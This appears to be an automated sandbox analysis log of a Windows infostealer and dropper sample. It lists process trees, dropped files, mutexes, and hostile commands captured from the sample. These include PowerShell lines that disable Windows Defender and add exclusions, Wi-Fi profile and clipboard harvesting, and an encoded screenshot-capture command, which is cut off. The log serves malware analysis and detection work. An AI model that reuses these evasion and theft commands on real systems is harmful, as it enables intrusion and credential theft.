Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFB752A04 appears 34 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFB75300D appears 50 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFB751EF1 appears 553 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFB6FD74F appears 214 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFB6912EE appears 562 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFB754057 appears 334 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFB7524B9 appears 44 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FFDFB752734 appears 234 times
Source: C:\ProgramData\Microsoft\based.exe	Code function: String function: 00007FF7D15425F0 appears 100 times
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: String function: 00007FF692972B30 appears 47 times
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: String function: 00007FF7691A25F0 appears 100 times
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Code function: String function: 00007FF7691A2760 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: String function: 00941590 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Code function: String function: 00941D60 appears 31 times

Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.5.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: rar.exe.6.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.6.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: wxyubnjmnlae.tmp.13.dr	Static PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Source: setup.exe.11.dr	Static PE information: Number of sections : 11 > 10
Source: updater.exe.13.dr	Static PE information: Number of sections : 11 > 10

Source: VaTlw2kNGc.exe, 00000000.00000003.1703132629.0000027991A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe, 00000000.00000003.1701573415.0000027991A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe, 00000000.00000003.1701344521.0000027991A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe, 00000000.00000003.1703039759.0000027991A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe, 00000000.00000003.1701653066.0000027991A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe, 00000000.00000003.1701766609.0000027991A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe, 00000000.00000003.1701443369.0000027991A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe, 00000000.00000003.1701216930.0000027991A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe	Binary or memory string: OriginalFilename vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe, 00000001.00000003.1713406098.000001A21EE93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe, 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe, 00000001.00000002.1717293755.000001A21EE98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs VaTlw2kNGc.exe
Source: VaTlw2kNGc.exe, 00000001.00000003.1716566464.000001A21EE96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs VaTlw2kNGc.exe

Source: libcrypto-1_1.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.998771639088251
Source: python310.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.99934387748315
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9943230597527473
Source: libcrypto-1_1.dll.6.dr	Static PE information: Section: UPX1 ZLIB complexity 0.998771639088251
Source: libssl-1_1.dll.6.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9903694614553314
Source: python310.dll.6.dr	Static PE information: Section: UPX1 ZLIB complexity 0.99934387748315
Source: sqlite3.dll.6.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9978469358079526
Source: unicodedata.pyd.6.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9943230597527473

Source: setup.exe, 0000000D.00000000.1760478396.00007FF690C49000.00000008.00000001.01000000.0000001F.sdmp

Binary or memory string: .SlnIX

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@163/125@3/3

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

Code function: 0_2_00007FF7691A29E0 GetLastError,FormatMessageW,MessageBoxW,

0_2_00007FF7691A29E0

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe

Code function: 4_2_0093C652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

4_2_0093C652

Source: C:\ProgramData\setup.exe

File created: C:\Program Files\Google\Chrome\updater.exe

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

File created: C:\Users\user\Desktop\PbqyFjSG.log

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\ProgramData\Microsoft\based.exe	Mutant created: \Sessions\1\BaseNamedObjects\J
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\3e64fe795a96f6df9d1018608996331101f86f90de28dc67ad34401869b49857
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9124:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI69202

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Command line argument: sfxname	4_2_0094037C
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Command line argument: sfxstime	4_2_0094037C
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Command line argument: STARTDLG	4_2_0094037C

Source: VaTlw2kNGc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: based.exe, 00000008.00000003.1909840733.00000273EDA74000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1908636737.00000273EDA6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: based.exe, 00000008.00000002.2587870470.00007FFDFF191000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: VaTlw2kNGc.exe

ReversingLabs: Detection: 47%

Source: based.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: based.exe	String found in binary or memory: --help
Source: based.exe	String found in binary or memory: --help
Source: based.exe	String found in binary or memory: id-cmc-addExtensions
Source: based.exe	String found in binary or memory: set-addPolicy

Source: C:\Users\user\Desktop\VaTlw2kNGc.exe

File read: C:\Users\user\Desktop\VaTlw2kNGc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\VaTlw2kNGc.exe "C:\Users\user\Desktop\VaTlw2kNGc.exe"
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Process created: C:\Users\user\Desktop\VaTlw2kNGc.exe "C:\Users\user\Desktop\VaTlw2kNGc.exe"
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAG